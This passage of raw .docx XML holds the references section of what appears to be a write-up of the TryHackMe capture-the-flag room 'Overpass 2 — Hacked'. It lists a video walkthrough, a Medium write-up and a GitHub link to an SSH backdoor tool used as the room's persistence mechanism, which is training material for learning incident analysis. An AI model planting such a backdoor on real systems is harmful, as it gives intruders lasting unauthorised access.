        <w:pBdr>
          <w:bottom w:val="single" w:color="1F4E79" w:sz="8" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="160" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">9. References</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">TryHackMe room: Overpass 2 — Hacked</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Video walkthrough — John Hammond, "Overpass 2! Hacked — TryHackMe": https://www.youtube.com/watch?v=XtySdRYCbiY</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Write-up — rootRS7, "Overpass 2 — Hacked | TryHackMe | Walkthrough" (Medium): https://medium.com/@sehgalrudra07/overpass-2-hacked-tryhackme-walkthrough-2abfdb15834f</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Persistence tool source (legitimate open-source project used as the room's backdoor): https://github.com/NinjaJc01/ssh-backdoor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2026-09-28T22:23:03.408Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-09-28T22:23:03.418Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>